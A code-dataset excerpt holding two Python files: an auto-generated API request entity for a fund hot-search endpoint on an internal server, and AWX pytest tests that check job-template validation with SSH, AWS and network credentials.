3dd7c3f65e14b78958e8369738bb17b7439df1b5 | c4a57dced2f1ed5fd5bac6de620e993a6250ca97 | /huaxin/huaxin_restful_service/restful_xjb_service/v1_services_fund_findhotsearchproduct_entity.py | 937e9b0575a6717a572f56f3bd8ef4aa2b8546be | [] | no_license | wanglili1703/firewill | f1b287b90afddfe4f31ec063ff0bd5802068be4f | 1996f4c01b22b9aec3ae1e243d683af626eb76b8 | refs/heads/master | 2020-05-24T07:51:12.612678 | 2019-05-17T07:38:08 | 2019-05-17T07:38:08 | 187,169,391 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,811 | py | import json
from code_gen.lib.basic_troop_service_entity_handler import BasicTroopServiceEntityHandler
DOMAIN_NAME = u'10.199.111.2'
URL = u'http://%s/V1/services/fund/findHotSearchProduct?'
BODY_DATA = ''
_BODY_DATA = ''
if BODY_DATA:
_BODY_DATA = json.loads(BODY_DATA)
QUERY_DATA = u'timestamp=1495434109309&noncestr=2xtvjvg9ri7mgtdw&signature=83294161CE239E4B845F3A767E6263E9A9D25044'
METHOD_TYPE = u'get'
CONTENT_TYPE = 'json'
REQUEST_DATA = (_BODY_DATA or QUERY_DATA)
HAS_DATA_PATTERN = True
DATA_PATTERN = {"timestam": "1495434895311", "noncestr": "mqy95mtwzkcugvqh",
"signature": "6CFA3F57564C7755C2D1002EBB2518E3B68FDAD6"}
class V1ServicesFundFindhotsearchproductEntity(BasicTroopServiceEntityHandler):
"""
accessible attribute list for response data:
%s
==================
kwargs for request:
Please refer to the constants BODY_DATA or QUERY_DATA request parameters
"""
def __init__(self, domain_name=DOMAIN_NAME, token=None, **kwargs):
super(V1ServicesFundFindhotsearchproductEntity, self).__init__(domain_name=domain_name, url_string=URL,
data=REQUEST_DATA,
method_type=METHOD_TYPE,
request_content_type=CONTENT_TYPE,
has_data_pattern=HAS_DATA_PATTERN, token=token,
**kwargs)
def _set_data_pattern(self, *args, **kwargs):
self._current_data_pattern = DATA_PATTERN
if (__name__ == '__main__'):
e = V1ServicesFundFindhotsearchproductEntity()
e.send_request()
| [
"[email protected]"
] | |
fe52028f642c5e303add875b04d4a7db496a04c2 | 3a458d9efb62c055542beb6685c7250910bc4fdc | /awx/main/tests/functional/models/test_job_options.py | 65add96de980233a1f7b8f1793bc264e384e6cea | [
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"Python-2.0",
"Apache-2.0"
] | permissive | aperigault/awx | 2e1b8c56592fdc20812b0c3841fb836d1a7a61a8 | 2ef840ce128a8028fe63b01b47bc5be5304062b2 | refs/heads/devel | 2021-11-21T03:28:31.346758 | 2021-10-12T18:19:40 | 2021-11-16T15:27:27 | 125,395,064 | 0 | 0 | Apache-2.0 | 2018-07-13T13:37:14 | 2018-03-15T16:22:23 | Python | UTF-8 | Python | false | false | 759 | py | import pytest
from awx.main.models import Credential
@pytest.mark.django_db
def test_clean_credential_with_ssh_type(credentialtype_ssh, job_template):
credential = Credential(name='My Credential', credential_type=credentialtype_ssh)
credential.save()
job_template.credentials.add(credential)
job_template.full_clean()
@pytest.mark.django_db
def test_clean_credential_with_custom_types(credentialtype_aws, credentialtype_net, job_template):
aws = Credential(name='AWS Credential', credential_type=credentialtype_aws)
aws.save()
net = Credential(name='Net Credential', credential_type=credentialtype_net)
net.save()
job_template.credentials.add(aws)
job_template.credentials.add(net)
job_template.full_clean()
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.